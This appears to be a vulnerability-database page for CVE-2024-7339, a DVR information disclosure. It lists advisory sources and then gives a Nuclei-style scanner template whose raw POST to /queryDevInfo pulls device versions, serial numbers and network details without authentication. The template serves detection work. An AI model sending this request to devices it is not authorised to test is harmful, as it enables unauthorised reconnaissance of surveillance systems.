| Reporter | Title | Published | Views |
|---|---|---|---|
| bdu_fstec | The vulnerability of the software for hybrid HD video recorders TD-2104TS-CL, TD-2108TS-HP, TD-2116TE-HP, AV108T, SH-4050A5-5L(MM), and SH-8100A-2L(MM) lies in the lack of protection for operational data, allowing attackers to disclose the protected information. | 19 Aug 2024 00:00 | – |
| githubexploit | Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Provision-Isr Sh-4050A5-5L(Mm)_Firmware | 5 Aug 2024 16:26 | – |
| circl | CVE-2024-7339 | 1 Aug 2024 07:03 | – |
| cnnvd | TVT DVR TD-2104TS-CL and TD-2108TS-HP information disclosure vulnerability | 1 Aug 2024 00:00 | – |
| cve | CVE-2024-7339 | 1 Aug 2024 04:00 | – |
| cvelist | CVE-2024-7339 TVT DVR TD-2104TS-CL queryDevInfo information disclosure | 1 Aug 2024 04:00 | – |
| nvd | CVE-2024-7339 | 1 Aug 2024 04:15 | – |
| osv | CVE-2024-7339 | 1 Aug 2024 04:15 | – |
| ptsecurity | PT-2024-5614 · Provision Isr +2 · Sh-8100A-2L +5 | 1 Aug 2024 00:00 | – |
| redhatcve | CVE-2024-7339 | 23 May 2025 09:50 | – |

```yaml
id: CVE-2024-7339

info:
  name: TVT DVR Sensitive Device - Information Disclosure
  author: Stuxctf
  severity: medium
  description: |
    A vulnerability has been found in TVT DVR TD-2104TS-CL, DVR TD-2108TS-HP, Provision-ISR DVR SH-4050A5-5L(MM) and AVISION DVR AV108T and classified as problematic. This vulnerability affects unknown code of the file /queryDevInfo. The manipulation leads to information disclosure.
  impact: |
    An attacker can get detailed device information including hardware and software versions, serial numbers, and network configuration.
  remediation: |
    Implement strict access controls and authentication mechanisms to manage access to the device interfaces.
  reference:
    - https://netsecfish.notion.site/Sensitive-Device-Information-Disclosure-in-TVT-DVR-fad1cce703d946969be5130bf3aaac0d
    - https://netsecfish.notion.site/Sensitive-Device-Information-Disclosure-in-TVT-DVR-fad1cce703d946969be5130bf3aaac0d?pvs=4
    - https://vuldb.com/?ctiid.273262
    - https://vuldb.com/?id.273262
    - https://vuldb.com/?submit.379373
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-7339
    cwe-id: CWE-200
    epss-score: 0.32028
    epss-percentile: 0.98096
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2024,dvr,tvt,info-leak,vkev,vuln

http:
  - raw:
      - |
        POST /queryDevInfo HTTP/1.1
        Host: {{Hostname}}

        <?xml version="1.0" encoding="utf-8" ?><request version="1.0" systemType="NVMS-9000" clientType="WEB"/>

    # Both matchers below must succeed for the template to report a finding.
    matchers-condition: and
    matchers:
      # The response must contain both strings.
      - type: word
        words:
          - "softwareVersion"
          - "eth0"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402206991ad38c0b9a4296cc4c6d8c65d82e5adb02e1367528b303b0e9e76d9fd502f02203e03e94d87d16c273d0ef29e926bb65d0d8d6bfe019a540f79683dec52f436d0:922c64590222798bb761d5b6d8e72950
```